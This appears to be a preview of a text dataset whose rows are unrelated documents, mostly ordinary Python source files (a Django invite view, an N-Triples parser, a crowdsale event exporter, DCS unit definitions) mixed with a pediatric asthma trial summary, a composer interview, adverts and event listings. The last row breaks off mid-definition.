text
stringlengths
29
850k
# -*- coding: utf-8 -*- # # Copyright (c) 2013 Clione Software # Copyright (c) 2010-2013 Cidadania S. Coop. Galega # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from django.core.mail import EmailMessage, EmailMultiAlternatives from django.shortcuts import render_to_response from django.template import RequestContext, loader, Context from django.contrib.auth.decorators import login_required from django.utils.translation import ugettext_lazy as _ from e_cidadania import settings @login_required def invite(request): """ Simple view to send invitations to friends via mail. Making the invitation system as a view, guarantees that no invitation will be monitored or saved to the hard disk. """ if request.method == "POST": mail_addr = request.POST['email_addr'] raw_addr_list = mail_addr.split(',') addr_list = [x.strip() for x in raw_addr_list] usr_msg = request.POST['mail_msg'] plain_template = "invite/invite_plain.txt" html_template = "invite/invite.html" plain_msg = loader.get_template(plain_template).render( RequestContext(request, {'msg': usr_msg})) html_msg = loader.get_template(html_template).render( RequestContext(request, {'msg': usr_msg})) email = EmailMultiAlternatives(_('Invitation to join e-cidadania'), plain_msg, settings.DEFAULT_FROM_EMAIL, [], addr_list) email.attach_alternative(html_msg, 'text/html') email.send(fail_silently=False) return render_to_response('invite_done.html', context_instance=RequestContext(request)) uri = request.build_absolute_uri("/") return render_to_response('invite.html', {"uri": uri}, context_instance=RequestContext(request))
Am Fam Physician. 2001 Mar 15;63(6):1203-1204. Acute exacerbation of asthma is one of the most common medical reasons for emergency department visits in children. In this setting, standard therapy consists of supplemental oxygen, inhaled beta2-adrenergic agonists, anticholinergic agents and, usually, systemic corticosteroids. Corticosteroids, whether oral or inhaled, have been shown to decrease hospitalizations and prevent progression of symptoms in children with acute asthma. Because of concerns about the safety of repeated doses of systemic steroids, there has been a growing trend toward the use of inhaled steroids as an alternative therapy. However, the data to support this practice are limited. Schuh and colleagues performed a study to compare the efficacy of inhaled fluticasone with oral prednisone in children with severe acute asthma. Children enrolled in the study were seen in a pediatric emergency department with a diagnosis of acute asthma. The children were at least five years of age and had a forced expiratory volume in one second (FEV1) of less than 60 percent of the predicted value. Children were excluded who had not previously wheezed, who had received oral prednisone within the past seven days or who had already taken regular doses of inhaled corticosteroids. Eligible children were randomized to receive a single 2-mg dose of inhaled fluticasone (via an inhaler with a spacer) or oral prednisone syrup in a dosage of 2 mg per kg. Placebo inhalers and syrup were used as well. In addition, all children received five doses of nebulized albuterol. Ipratropium bromide was added to the first three doses of albuterol. Parents of the children who responded to the initial therapies were instructed to continue giving the inhaled steroid or prednisone for an additional seven days after discharge. The parents of all children were instructed to continue giving albuterol via inhaler four times a day for seven days. Children who were persistently in respiratory distress four to five hours after the experimental interventions were admitted to the hospital. The primary outcome of the study was a change in FEV1 from baseline to 240 minutes. Secondary outcomes were the changes in forced vital capacity (FVC), peak expiratory flow rate, respiratory rate, oxygen saturation on room air and rate of hospitalization. In the study, 51 children were randomized to the fluticasone group and 49 to the oral prednisone group. The mean age was nine years, with a range of five to 17 years. The FEV1 increased from baseline to 240 minutes by a mean of 19 percent in the oral steroid group (P <0.001) compared with 9.4 percent in the inhaled steroid group. Thirteen of the children in the oral prednisone group had an “excellent” response (an increase of FEV1 greater than 25 percent) but only five in the inhaled fluticasone group had such a response. In contrast, 16 in the latter group had a “poor” response (an increase in FEV1 of less than 5 percent) compared with just four children taking oral prednisone. Moreover, 25 percent of children in the inhalation therapy group actually had a reduction in baseline FEV1 at 240 minutes, whereas no children in the oral prednisone group showed a decline in FEV1. The FVC and predicted peak expiratory flow rates were also significantly greater in the oral steroid group. Following the study, 16 children (31 percent) in the fluticasone group were admitted to the hospital compared with only five (10 percent) in the prednisone group. The authors conclude that oral prednisone is superior to inhaled fluticasone in the treatment of children with acute exacerbations of asthma. They recommend that inhaled corticosteroids not be used for children in this clinical setting. Schuh S, et al. A comparison of inhaled fluticasone and oral prednisone for children with severe acute asthma. N Engl J Med. September 7, 2000;343:689–94.
#!/usr/bin/env python __doc__=""" N-Triples Parser License: GPL 2, W3C, BSD, or MIT Author: Sean B. Palmer, inamidst.com Documentation: http://inamidst.com/proj/rdf/ntriples-doc Command line usage:: ./ntriples.py <URI> - parses URI as N-Triples ./ntriples.py --help - prints out this help message # @@ fully empty document? """ import re uriref = r'<([^:]+:[^\s"<>]+)>' literal = r'"([^"\\]*(?:\\.[^"\\]*)*)"' litinfo = r'(?:@([a-z]+(?:-[a-z0-9]+)*)|\^\^' + uriref + r')?' r_line = re.compile(r'([^\r\n]*)(?:\r\n|\r|\n)') r_wspace = re.compile(r'[ \t]*') r_wspaces = re.compile(r'[ \t]+') r_tail = re.compile(r'[ \t]*\.[ \t]*') r_uriref = re.compile(uriref) r_nodeid = re.compile(r'_:([A-Za-z][A-Za-z0-9]*)') r_literal = re.compile(literal + litinfo) bufsiz = 2048 validate = False class Node(unicode): pass # class URI(Node): pass # class bNode(Node): pass # class Literal(Node): # def __new__(cls, lit, lang=None, dtype=None): # n = str(lang) + ' ' + str(dtype) + ' ' + lit # return unicode.__new__(cls, n) from rdflib.term import URIRef as URI from rdflib.term import BNode as bNode from rdflib.term import Literal class Sink(object): def __init__(self): self.length = 0 def triple(self, s, p, o): self.length += 1 print (s, p, o) class ParseError(Exception): pass quot = {'t': '\t', 'n': '\n', 'r': '\r', '"': '"', '\\': '\\'} r_safe = re.compile(r'([\x20\x21\x23-\x5B\x5D-\x7E]+)') r_quot = re.compile(r'\\(t|n|r|"|\\)') r_uniquot = re.compile(r'\\u([0-9A-F]{4})|\\U([0-9A-F]{8})') def unquote(s): """Unquote an N-Triples string.""" result = [] while s: m = r_safe.match(s) if m: s = s[m.end():] result.append(m.group(1)) continue m = r_quot.match(s) if m: s = s[2:] result.append(quot[m.group(1)]) continue m = r_uniquot.match(s) if m: s = s[m.end():] u, U = m.groups() codepoint = int(u or U, 16) if codepoint > 0x10FFFF: raise ParseError("Disallowed codepoint: %08X" % codepoint) result.append(unichr(codepoint)) elif s.startswith('\\'): raise ParseError("Illegal escape at: %s..." % s[:10]) else: raise ParseError("Illegal literal character: %r" % s[0]) return unicode(''.join(result)) if not validate: def unquote(s): return s.decode('unicode-escape') r_hibyte = re.compile(r'([\x80-\xFF])') def uriquote(uri): return r_hibyte.sub(lambda m: '%%%02X' % ord(m.group(1)), uri) if not validate: def uriquote(uri): return uri class NTriplesParser(object): """An N-Triples Parser. Usage:: p = NTriplesParser(sink=MySink()) sink = p.parse(f) # file; use parsestring for a string """ def __init__(self, sink=None): if sink is not None: self.sink = sink else: self.sink = Sink() def parse(self, f): """Parse f as an N-Triples file.""" if not hasattr(f, 'read'): raise ParseError("Item to parse must be a file-like object.") self.file = f self.buffer = '' while True: self.line = self.readline() if self.line is None: break try: self.parseline() except ParseError: raise ParseError("Invalid line: %r" % self.line) return self.sink def parsestring(self, s): """Parse s as an N-Triples string.""" if not isinstance(s, basestring): raise ParseError("Item to parse must be a string instance.") from cStringIO import StringIO f = StringIO() f.write(s) f.seek(0) self.parse(f) def readline(self): """Read an N-Triples line from buffered input.""" # N-Triples lines end in either CRLF, CR, or LF # Therefore, we can't just use f.readline() if not self.buffer: buffer = self.file.read(bufsiz) if not buffer: return None self.buffer = buffer while True: m = r_line.match(self.buffer) if m: # the more likely prospect self.buffer = self.buffer[m.end():] return m.group(1) else: buffer = self.file.read(bufsiz) if not buffer and not self.buffer.isspace(): raise ParseError("EOF in line") elif not buffer: return None self.buffer += buffer def parseline(self): self.eat(r_wspace) if (not self.line) or self.line.startswith('#'): return # The line is empty or a comment subject = self.subject() self.eat(r_wspaces) predicate = self.predicate() self.eat(r_wspaces) object = self.object() self.eat(r_tail) if self.line: raise ParseError("Trailing garbage") self.sink.triple(subject, predicate, object) def peek(self, token): return self.line.startswith(token) def eat(self, pattern): m = pattern.match(self.line) if not m: # @@ Why can't we get the original pattern? raise ParseError("Failed to eat %s" % pattern) self.line = self.line[m.end():] return m def subject(self): # @@ Consider using dictionary cases subj = self.uriref() or self.nodeid() if not subj: raise ParseError("Subject must be uriref or nodeID") return subj def predicate(self): pred = self.uriref() if not pred: raise ParseError("Predicate must be uriref") return pred def object(self): objt = self.uriref() or self.nodeid() or self.literal() if objt is False: raise ParseError("Unrecognised object type") return objt def uriref(self): if self.peek('<'): uri = self.eat(r_uriref).group(1) uri = unquote(uri) uri = uriquote(uri) return URI(uri) return False def nodeid(self): if self.peek('_'): return bNode(self.eat(r_nodeid).group(1)) return False def literal(self): if self.peek('"'): lit, lang, dtype = self.eat(r_literal).groups() lang = lang or None dtype = dtype or None if lang and dtype: raise ParseError("Can't have both a language and a datatype") lit = unquote(lit) return Literal(lit, lang, dtype) return False def parseURI(uri): import urllib parser = NTriplesParser() u = urllib.urlopen(uri) sink = parser.parse(u) u.close() # for triple in sink: # print triple print 'Length of input:', sink.length def main(): import sys if len(sys.argv) == 2: parseURI(sys.argv[1]) else: print __doc__ if __name__=="__main__": main()
Installation of all work is undertaken by trained and experienced fitters. From acrylic plaques to large fabricated signage, we will ensure that all projects large or small are carried out safely, on time & with minimum disruption to your business. The knowledge and use of correct fixings, adhesives and framing systems is critical for a successful installation. Optima Signs are fully insured and our fitters hold up to date safe pass cards and M.E.W.P. (Mobile Elevated Working Platform) operating licenses.
import ctypes import os import random import sqlite3 import threading from contextlib import closing from decimal import ROUND_HALF_UP, Decimal from pathlib import Path import numexpr import Data class DescriptiveError(Exception): pass def tuple_overlap(a: tuple, b: tuple) -> bool: """ checks if the first two elements of the tuples overlap on the numberline/other ordering """ a, b = sorted(a), sorted(b) return ( b[0] <= a[0] <= b[1] or b[0] <= a[1] <= b[1] or a[0] <= b[0] <= a[1] or a[0] <= b[1] <= a[1] ) def terminate_thread(thread: threading.Thread): """Terminates a python thread from another thread. :param thread: a threading.Thread instance """ if not thread.is_alive(): return exc = ctypes.py_object(SystemExit) res = ctypes.pythonapi.PyThreadState_SetAsyncExc(ctypes.c_long(thread.ident), exc) if res == 0: raise ValueError("nonexistent thread id") if res > 1: # """if it returns a number greater than one, you're in trouble, # and you should call it again with exc=NULL to revert the effect""" ctypes.pythonapi.PyThreadState_SetAsyncExc(thread.ident, None) raise SystemError("PyThreadState_SetAsyncExc failed") def init_db(): print("initializing DB") with closing(connect_db("initialization")) as db: db.cursor().executescript(Data.getschema()) db.commit() def calculate(calc, par=None): loose_par = [0] # last pop ends the loop if par is None: par = {} else: loose_par += [x for x in par.split(",") if ":" not in x] par = { x.upper(): y for x, y in [pair.split(":") for pair in par.split(",") if ":" in pair] } for k, v in par.items(): calc = calc.replace(k, v) calc = calc.strip() missing = None res = 0 while len(loose_par) > 0: try: res = numexpr.evaluate(calc, local_dict=par, truediv=True).item() missing = None # success break except KeyError as e: missing = e par[e.args[0]] = float(loose_par.pop()) # try autofilling if missing: raise DescriptiveError("Parameter " + missing.args[0] + " is missing!") return Decimal(res).quantize(1, ROUND_HALF_UP) g = {} # module level caching def close_db(): db = g.get("db", None) if db: db.close() g["db"] = None def connect_db(source) -> sqlite3.Connection: """db connection singleton""" db = g.get("db", None) if db: return db dbpath = Data.DATABASE if source != "before request": print("connecting to", dbpath, "from", source) if not Path(dbpath).exists(): Path(dbpath).touch() init_db() g["db"] = sqlite3.connect(dbpath) return g["db"] def write_nonblocking(path, data): path = Path(path) if path.is_dir(): path = path / "_" i = 0 while (path.with_suffix(f".{i}")).exists(): i += 1 with path.with_suffix(f".{i}").open(mode="x") as x: x.write(data + "\n") x.write("DONE") # mark file as ready def read_nonblocking(path): path = Path(path) if path.is_dir(): path = path / "_" result = [] file: Path for file in sorted(path.parent.glob(str(path.stem) + "*")): with file.open(mode="r") as f: lines = f.readlines() if lines[-1] != "DONE": break # file not read yet or fragmented result += lines[:-1] os.remove(str(file.absolute())) return result def is_int(s: str) -> bool: try: int(s) return True except ValueError: return False def sumdict(inp): result = 0 try: for e in inp.keys(): result += int(inp[e]) except Exception: result = sum(inp) return result def d10(amt, diff, ones=True): # faster than the Dice succ = 0 anti = 0 for _ in range(amt): x = random.randint(1, 10) if x >= diff: succ += 1 if ones and x == 1: anti += 1 if anti > 0: if succ > anti: return succ - anti if succ > 0: return 0 return 0 - anti return succ def split_at(a, x): return a[:x], a[x:]
Which is probably a good thing in this case, or else people would think that Gralen and Jessy were a couple of rude buttheads. But, as I stated in my previous post concerning my older cartoons(The Way Back Machine), a lot of the “punchlines” were simply the main character or characters laughing at the guest character’s predicament or…, the way that they talk. They are certainly not trying to be rude. They are like children, and when children see, or hear, something funny, they laugh. If you take it as coming from a young boy with a weird imagination who grew up during a time when political correctness wasn’t even on the radar, maybe you can laugh along with him(and them). Another thing you will notice about some of these older cartoons of mine, is that I used to make title pages for them(forgot I even did that) and would introduce the characters who were in that days cartoon. Note that Jessy in this one is described as Gralen’s little brother instead of being Gralen’s son as in more recent episodes(already posted here). The names would jump around with some characters , as you will see in future postings. I think the only one who kept his name with his character was Gralen. He was always the same dinosaur and always the lead.
"""Extract crowdsale raw investmetn data.""" import csv import datetime import click from eth_utils import from_wei from populus import Project @click.command() @click.option('--chain', nargs=1, default="mainnet", help='On which chain to deploy - see populus.json') @click.option('--address', nargs=1, help='CrowdsaleContract address to scan', required=True) @click.option('--csv-file', nargs=1, help='CSV file to write', default=None, required=True) def main(chain, address, csv_file): """Extract crowdsale invested events. This is useful for RelaunchCrowdsale to rebuild the data. """ project = Project() with project.get_chain(chain) as c: web3 = c.web3 print("Web3 provider is", web3.currentProvider) # Sanity check print("Block number is", web3.eth.blockNumber) Crowdsale = c.provider.get_base_contract_factory('MintedTokenCappedCrowdsale') crowdsale = Crowdsale(address=address) print("Total amount raised is", from_wei(crowdsale.call().weiRaised(), "ether"), "ether") print("Getting events") events = crowdsale.pastEvents("Invested").get(only_changes=False) print("Writing results to", csv_file) with open(csv_file, 'w', newline='') as out: writer = csv.writer(out) writer.writerow(["Address", "Payment at", "Tx hash", "Tx index", "Invested ETH", "Received tokens"]) for e in events: timestamp = web3.eth.getBlock(e["blockNumber"])["timestamp"] dt = datetime.datetime.fromtimestamp(timestamp, tz=datetime.timezone.utc) writer.writerow([ e["args"]["investor"], dt.isoformat(), e["transactionHash"], e["transactionIndex"], from_wei(e["args"]["weiAmount"], "ether"), e["args"]["tokenAmount"], ]) print("Total", len(events), "invest events") print("All done! Enjoy your decentralized future.") if __name__ == "__main__": main()
Tonight’s Prom includes a short orchestral work by US composer Andrew Norman, titled Spiral. Here are his answers to my pre-première questions, together with the programme note for the piece. Many thanks to Andrew for his responses. 1. For anyone not yet familiar with it, could you give a brief summary of your music, i.e. characteristics, outlook, aesthetic, etc.? Such a tough question!! I write music that is often about the process (or struggle) of making something. I think the best ideas in my pieces are trying to form themselves in real time, they are trying to become something as they go. I don’t like to present material so much as unleash it in an unformed state and watch it find its true self. I love the idea that a piece of music can be like tracing a thought through a brain. Sometimes that thought’s journey is focused and sustained, and other times it is filled with non-sequiturs, wrong turns, and crazy tangents. A lot of my music explores the rhetoric of juxtaposition, jump cuts, and fragmentation. Ideas are chopped into little pieces and made to jostle around with each other, constantly reframing and intercutting each other. I tend toward timbres that are on the rough and raw end of the spectrum, and I especially love using these sounds not as a replacement for traditionally beautiful sounds, but as a foil, or an expansion, of them. My music is often highly kinetic, and it relies heavily on the physicality, the visual theatre, of instrumental playing for its full effect. I really believe in live instrumental performance, and there are aspects to many of my pieces which can’t be gleaned from a recording (my apologies to the radio audience!). 2. What led to you becoming a composer? Did/does it feel like a choice? I’ve been a performer since I was a child, and I played in orchestra all throughout school. Writing music felt like a natural extension of my activities as a musician when I was younger. As I’ve gotten older, writing has definitely gotten harder, and a lot less natural-feeling, but I keep at it in hopes that someday I will stumble onto something of which I can be proud. 3. Where did you study? Who/what have been the most important influences on your work? I studied at the University of Southern California and at Yale. I’ve had some amazing teachers, including Donald Crockett, Stephen Hartke, Aaron Kernis and Martin Bresnick. 4. How do you go about writing a new piece? To what extent do you start with a ‘blank slate’ and/or use existing methods/materials? Starting a new piece is always dreadful for me. I feel lost for a really long time. I feel like I’ve forgotten how to write music, and that I may never be able to do it again. Sometimes in this lost state I sketch random fragments of musical ideas. Sometimes I improvise on the viola and the piano, usually thinking about a particular physical gesture as a starting point. I work in a really non-linear, fragmented, aimless way for a long time. Usually what happens is that at a certain point, months and months later, something falls into place, some small connection between sounds or ideas, that allows me to begin to make sense and shape of what I’m doing. More connections become clear, and at the last possible moment (or just past it) everything – the sounds, the forms, the conceits – falls into some semblance of place and I have a piece. And then after the first performance, when I know more about what I’ve done, I go back and rewrite everything. 5. How does the piece sit in relation to your previous work? Why did you particularly compose this piece at this time? Spiral explores some themes that I return to often in my work: organic growth, gradual accretion, the slow formation of a musical thought through repetition, the compression and expansion of time, the relationship of physical gesture to expression in string playing, and the spatialization of sound within a traditional orchestra. Spiral is what I like to call a one-idea piece. Like the third movement of Play or the last movement The Companion Guide to Rome, it really is about the gradual formation of one single thing. I was trying to capture the sense of watching something slowly come into, and then perhaps move past, focus. Or perhaps it is the idea of zooming out on a fractal, or of regarding one’s receding selves in a multi-sided mirror chamber. As with a lot of my work, Escher-esque geometries are not too far buried beneath the surface. Practically speaking, Spiral exists because I was asked by Simon Rattle to write a five-minute orchestral piece for one of his last concerts as music director of the Berlin Philharmonic. I knew I wanted to create a single big shape with my five minutes of Philharmonic time, and Spiral is the result. 6. If people really like your piece, what other music of yours would you recommend they check out? There are nice recordings of my pieces Play, Switch, and The Companion Guide to Rome available commercially. But I am always a little reticent to recommend my recordings – not because the players and the performances aren’t spectacular and compelling (they are), but more because I make music for live performance, and a recording for me is only an artifact, a documentation, of a particular experience, and not the experience itself. Go see it live! I’m very late on a big piece for the Los Angeles Philharmonic, and on a cello concerto for Johannes Moser. Commissioned by the Berlin Philharmonic to be part of Simon Rattle’s final season with that orchestra, Spiral is a short piece that traces the transformations of a small number of instrumental gestures as they orbit each other in ever-contracting circles.
# -*- coding: utf-8 -*- import datetime from south.db import db from south.v2 import SchemaMigration from django.db import models class Migration(SchemaMigration): def forwards(self, orm): # Removing M2M table for field references on 'Message' db.delete_table('django_mailbox_message_references') def backwards(self, orm): # Adding M2M table for field references on 'Message' db.create_table('django_mailbox_message_references', ( ('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)), ('from_message', models.ForeignKey(orm['django_mailbox.message'], null=False)), ('to_message', models.ForeignKey(orm['django_mailbox.message'], null=False)) )) db.create_unique('django_mailbox_message_references', ['from_message_id', 'to_message_id']) models = { 'django_mailbox.mailbox': { 'Meta': {'object_name': 'Mailbox'}, 'active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}), 'uri': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '255', 'null': 'True', 'blank': 'True'}) }, 'django_mailbox.message': { 'Meta': {'object_name': 'Message'}, 'body': ('django.db.models.fields.TextField', [], {}), 'from_header': ('django.db.models.fields.CharField', [], {'max_length': '255'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'in_reply_to': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'replies'", 'null': 'True', 'to': "orm['django_mailbox.Message']"}), 'mailbox': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'messages'", 'to': "orm['django_mailbox.Mailbox']"}), 'message_id': ('django.db.models.fields.CharField', [], {'max_length': '255'}), 'outgoing': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'processed': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}), 'subject': ('django.db.models.fields.CharField', [], {'max_length': '255'}), 'to_header': ('django.db.models.fields.TextField', [], {}) } } complete_apps = ['django_mailbox']
Having a hard time looking for a Film Lab? The LomoLab offers development, scanning and printing of all 35mm, 110 and 120 films. Whatever kind of film development you're after, you'll find it here! Now, you can confidently shoot from the hip without having to worry where to develop those film rolls! This section is exclusively for LomoLab Services in USA and Canada. Got questions about the LomoLab? Check out our LomoLab FAQ. Develop and transfer your Lomokino movie into a Digital Version. Develop, scan and print your Panoramic Pictures with our lab experts. Develop, scan and print your Super Panoramic Pictures shot with your Spinner 360º or any other film camera. Leave your 35mm, 110mm or medium format in our expert hands for development, scans and prints.
""" This file is part of the TheLMA (THe Laboratory Management Application) project. See LICENSE.txt for licensing, CONTRIBUTORS.txt for contributor information. Creator for library creation ISO jobs. """ from thelma.tools.semiconstants import \ get_rack_specs_from_reservoir_specs from thelma.tools.semiconstants import get_item_status_future from thelma.tools.semiconstants import get_reservoir_specs_standard_384 from thelma.tools.semiconstants import get_reservoir_specs_standard_96 from thelma.tools.iso.libcreation.base import LibraryLayout from thelma.tools.iso.libcreation.base import NUMBER_SECTORS from thelma.tools.iso.libcreation.base import \ DEFAULT_ALIQUOT_PLATE_CONCENTRATION from thelma.tools.iso.libcreation.base import \ DEFAULT_PREPARATION_PLATE_CONCENTRATION from thelma.tools.iso.libcreation.base import \ LibraryBaseLayoutConverter from thelma.tools.iso.poolcreation.base import \ StockSampleCreationPosition from thelma.tools.iso.poolcreation.jobcreator import \ StockSampleCreationIsoJobCreator from thelma.tools.iso.poolcreation.jobcreator import \ StockSampleCreationIsoPopulator from thelma.tools.utils.racksector import QuadrantIterator from thelma.tools.utils.racksector import \ get_sector_layouts_for_384_layout __docformat__ = 'reStructuredText en' __all__ = ['LibraryCreationIsoJobCreator', 'LibraryCreationIsoPopulator', ] class LibraryCreationIsoPopulator(StockSampleCreationIsoPopulator): #: The label pattern for preparation plates. PREP_PLATE_LABEL_PATTERN = '%s-%i-%inM-Q%i' #: The label pattern for aliquot plates. ALIQUOT_PLATE_LABEL_PATTERN = '%s-%i-%inM-%i' def __init__(self, iso_request, number_isos, **kw): StockSampleCreationIsoPopulator.__init__(self, iso_request, number_isos, **kw) #: The library base layout. self.__base_layout = None #: Maps sector indices -> positions. self.__sector_positions = None def reset(self): StockSampleCreationIsoPopulator.reset(self) self.__base_layout = None self.__sector_positions = None @property def _base_layout(self): if self.__base_layout is None: lib = self.iso_request.molecule_design_library converter = LibraryBaseLayoutConverter(lib.rack_layout, parent=self) self.__base_layout = converter.get_result() return self.__base_layout @property def _sector_positions(self): if self.__sector_positions is None: self.__sector_positions = \ QuadrantIterator.sort_into_sectors(self._base_layout, NUMBER_SECTORS) return self.__sector_positions def _create_iso_layout(self): layout = LibraryLayout.from_base_layout(self._base_layout) for positions in self._sector_positions.values(): if not self._have_candidates: break for base_pos in positions: if not self._have_candidates: break lib_cand = self._pool_candidates.pop(0) lib_pos = \ StockSampleCreationPosition(base_pos.rack_position, lib_cand.pool, lib_cand.get_tube_barcodes()) layout.add_position(lib_pos) return layout def _populate_iso(self, iso, layout): StockSampleCreationIsoPopulator._populate_iso(self, iso, layout) # Create sector preparation plates. library_name = self.iso_request.label ir_specs_96 = get_reservoir_specs_standard_96() plate_specs_96 = get_rack_specs_from_reservoir_specs(ir_specs_96) ir_specs_384 = get_reservoir_specs_standard_384() plate_specs_384 = get_rack_specs_from_reservoir_specs(ir_specs_384) future_status = get_item_status_future() sec_layout_map = get_sector_layouts_for_384_layout(layout) # Create preparation plates. for sec_idx in range(NUMBER_SECTORS): if not sec_idx in sec_layout_map: continue # TODO: Move label creation to LABELS class. prep_label = self.PREP_PLATE_LABEL_PATTERN \ % (library_name, iso.layout_number, DEFAULT_PREPARATION_PLATE_CONCENTRATION, sec_idx + 1) prep_plate = plate_specs_96.create_rack(prep_label, future_status) sec_layout = sec_layout_map[sec_idx] iso.add_sector_preparation_plate(prep_plate, sec_idx, sec_layout.create_rack_layout()) # Create aliquot plates. for i in range(self.iso_request.number_aliquots): # TODO: Move label creation to LABELS class. aliquot_label = self.ALIQUOT_PLATE_LABEL_PATTERN \ % (library_name, iso.layout_number, DEFAULT_ALIQUOT_PLATE_CONCENTRATION, i + 1) aliquot_plate = plate_specs_384.create_rack(aliquot_label, future_status) iso.add_aliquot_plate(aliquot_plate) class LibraryCreationIsoJobCreator(StockSampleCreationIsoJobCreator): _ISO_POPULATOR_CLASS = LibraryCreationIsoPopulator
It was a pleasant surprise to see The Humans, Stephen Karam's Tony-studded portrait of intergenerational squabbles around the Thanksgiving dinner table, on the Alley's season this year. Karam's drama has quietly surprised critics far and wide as a prescient portrait of family amid the specter of American decline. Our review won't run 'til next week, but we're still comfortable recommending it on reputation alone. Tickets from $26. Alley Theatre, 615 Texas Ave. 713-220-5700. More info and tickets at alleytheatre.org. Ten high-flying dogs will be competing for your attention in this "canine cabaret," replete with Frisbee shenanigans and tricks from the likes of Feather, the world's highest-jumping dog. Fair warning: You'll have to put up with their two human handlers, too. Tickets from $45. Jones Hall, 615 Louisiana St. 713-22-4772. More info and tickets at spahouston.org. There's something special about the former first lady's recent memoir that tells a story that's equal parts bracing, inspiring, and instructive—one that the New York Times described as "a study in what happens when the ways we see ourselves don't always line up with the ways that society sees us." Join America's most-admired woman (per Gallup) as she rides the wave of her sold-out stadium book tour. Maybe she'll even roll up in that oh-so-famous pair of boots. Re-sale prices vary. Toyota Center, 1510 Polk St. Tickets available via Stubhub. The Houston Chronicle recently asked "Is the rodeo ready for Cardi B?" Based on the fact that the "Bodak Yellow" rapper's tickets sold out in 40 minutes flat—faster than even George Strait himself—we'd say the answer is a resounding yes. It's still unclear how the notoriously raunchy artist will manage to perform an all-clean set, but given the 26-year-old's ever growing star power, we're excited to see what happens. There's still time to pick up seats on the re-sale market—act quick. Re-sale prices vary. NRG Stadium, NRG Pkwy. More info and tickets at axs.com. We've loved this strip mall tiki bar since the beginning as a charming, if quirky place to quaff inventive cocktails from equally inventive barware. Sunday's birthday party celebrates half a decade with live music and special tiki mugs for sale. See you on the back patio? Free. Lei Low, 6412 N Main St. 713-380-2968. More info via Facebook.
# This file is generated from pydcs_export.lua import dcs.unittype as unittype class Artillery: class _2B11_mortar(unittype.VehicleType): id = "2B11 mortar" name = "Mortar 2B11 120mm" detection_range = 0 threat_range = 7000 air_weapon_dist = 7000 class SAU_Gvozdika(unittype.VehicleType): id = "SAU Gvozdika" name = "SPH 2S1 Gvozdika 122mm" detection_range = 0 threat_range = 15000 air_weapon_dist = 15000 class SAU_Msta(unittype.VehicleType): id = "SAU Msta" name = "SPH 2S19 Msta 152mm" detection_range = 0 threat_range = 23500 air_weapon_dist = 23500 class SAU_Akatsia(unittype.VehicleType): id = "SAU Akatsia" name = "SPH 2S3 Akatsia 152mm" detection_range = 0 threat_range = 17000 air_weapon_dist = 17000 class SAU_2_C9(unittype.VehicleType): id = "SAU 2-C9" name = "SPM 2S9 Nona 120mm M" detection_range = 0 threat_range = 7000 air_weapon_dist = 7000 class M_109(unittype.VehicleType): id = "M-109" name = "SPH M109 Paladin 155mm" detection_range = 0 threat_range = 22000 air_weapon_dist = 22000 eplrs = True class SpGH_Dana(unittype.VehicleType): id = "SpGH_Dana" name = "SPH Dana vz77 152mm" detection_range = 0 threat_range = 18700 air_weapon_dist = 18700 class Grad_FDDM(unittype.VehicleType): id = "Grad_FDDM" name = "Grad MRL FDDM (FC)" detection_range = 0 threat_range = 1000 air_weapon_dist = 1000 class MLRS_FDDM(unittype.VehicleType): id = "MLRS FDDM" name = "MRLS FDDM (FC)" detection_range = 0 threat_range = 1200 air_weapon_dist = 1200 eplrs = True class Grad_URAL(unittype.VehicleType): id = "Grad-URAL" name = "MLRS BM-21 Grad 122mm" detection_range = 0 threat_range = 19000 air_weapon_dist = 19000 class Uragan_BM_27(unittype.VehicleType): id = "Uragan_BM-27" name = "MLRS 9K57 Uragan BM-27 220mm" detection_range = 0 threat_range = 35800 air_weapon_dist = 35800 class Smerch(unittype.VehicleType): id = "Smerch" name = "MLRS 9A52 Smerch CM 300mm" detection_range = 0 threat_range = 70000 air_weapon_dist = 70000 class Smerch_HE(unittype.VehicleType): id = "Smerch_HE" name = "MLRS 9A52 Smerch HE 300mm" detection_range = 0 threat_range = 70000 air_weapon_dist = 70000 class MLRS(unittype.VehicleType): id = "MLRS" name = "MLRS M270 227mm" detection_range = 0 threat_range = 32000 air_weapon_dist = 32000 eplrs = True class T155_Firtina(unittype.VehicleType): id = "T155_Firtina" name = "SPH T155 Firtina 155mm" detection_range = 0 threat_range = 41000 air_weapon_dist = 41000 class PLZ05(unittype.VehicleType): id = "PLZ05" name = "PLZ-05" detection_range = 0 threat_range = 23500 air_weapon_dist = 23500 eplrs = True class M12_GMC(unittype.VehicleType): id = "M12_GMC" name = "SPG M12 GMC 155mm" detection_range = 0 threat_range = 18300 air_weapon_dist = 0 class Infantry: class Paratrooper_RPG_16(unittype.VehicleType): id = "Paratrooper RPG-16" name = "Paratrooper RPG-16" detection_range = 0 threat_range = 500 air_weapon_dist = 500 class Paratrooper_AKS_74(unittype.VehicleType): id = "Paratrooper AKS-74" name = "Paratrooper AKS" detection_range = 0 threat_range = 500 air_weapon_dist = 500 class Infantry_AK_Ins(unittype.VehicleType): id = "Infantry AK Ins" name = "Insurgent AK-74" detection_range = 0 threat_range = 500 air_weapon_dist = 500 class Soldier_AK(unittype.VehicleType): id = "Soldier AK" name = "Infantry AK-74" detection_range = 0 threat_range = 500 air_weapon_dist = 500 class Infantry_AK(unittype.VehicleType): id = "Infantry AK" name = "Infantry AK-74 Rus" detection_range = 0 threat_range = 500 air_weapon_dist = 500 class Soldier_M249(unittype.VehicleType): id = "Soldier M249" name = "Infantry M249" detection_range = 0 threat_range = 700 air_weapon_dist = 700 class Soldier_M4(unittype.VehicleType): id = "Soldier M4" name = "Infantry M4" detection_range = 0 threat_range = 